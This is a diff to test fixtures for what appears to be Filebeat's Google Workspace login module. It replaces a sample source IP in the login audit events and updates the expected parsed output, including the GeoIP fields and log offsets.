-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_login_less_secure_app","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_programmatic_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_generic","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_spamming_through_relay","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_spamming","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_hijacked","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"gov_attack_warning"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_failure_type","value":"login_failure_access_code_disallowed"},{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_challenge","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_verification","parameters":[{"name":"is_second_factor","boolValue":false},{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"logout","parameters":[{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"is_suspicious","boolValue":false},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_password_leak","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_login_less_secure_app","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_programmatic_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_generic","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_spamming_through_relay","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_spamming","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_hijacked","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"gov_attack_warning"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_failure","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_failure_type","value":"login_failure_access_code_disallowed"},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_challenge","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_verification","parameters":[{"name":"is_second_factor","boolValue":false},{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"logout","parameters":[{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_success","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"is_suspicious","boolValue":false},{"name":"login_type","value":"exchange"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json
index 68ecbb4fc1f5..8df0b1ccf9f0 100644
--- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
         "event.provider": "login",
         "event.type": [
             "change",
@@ -24,23 +24,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -64,7 +60,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
         "event.provider": "login",
         "event.start": "2020-07-02T13:08:25.123Z",
         "event.type": [
@@ -77,26 +73,22 @@
         "google_workspace.login.affected_email_address": "foo@elastic.co",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 406,
+        "log.offset": 405,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -120,7 +112,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
         "event.provider": "login",
         "event.start": "2020-07-02T13:08:25.123Z",
         "event.type": [
@@ -133,26 +125,22 @@
         "google_workspace.login.affected_email_address": "foo@elastic.co",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 853,
+        "log.offset": 851,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -176,7 +164,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
         "event.provider": "login",
         "event.start": "2020-07-02T13:08:25.123Z",
         "event.type": [
@@ -189,26 +177,22 @@
         "google_workspace.login.affected_email_address": "foo@elastic.co",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1316,
+        "log.offset": 1313,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -232,7 +216,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
         "event.provider": "login",
         "event.type": [
             "change",
@@ -245,26 +229,22 @@
         "google_workspace.login.affected_email_address": "foo@elastic.co",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1776,
+        "log.offset": 1772,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -288,7 +268,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
         "event.provider": "login",
         "event.type": [
             "change",
@@ -301,26 +281,22 @@
         "google_workspace.login.affected_email_address": "foo@elastic.co",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2176,
+        "log.offset": 2171,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -344,7 +320,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
         "event.provider": "login",
         "event.type": [
             "change",
@@ -357,26 +333,22 @@
         "google_workspace.login.affected_email_address": "foo@elastic.co",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2591,
+        "log.offset": 2585,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -400,7 +372,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
         "event.provider": "login",
         "event.start": "2020-07-02T13:08:25.123Z",
         "event.type": [
@@ -414,26 +386,22 @@
         "google_workspace.login.affected_email_address": "foo@elastic.co",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2992,
+        "log.offset": 2985,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
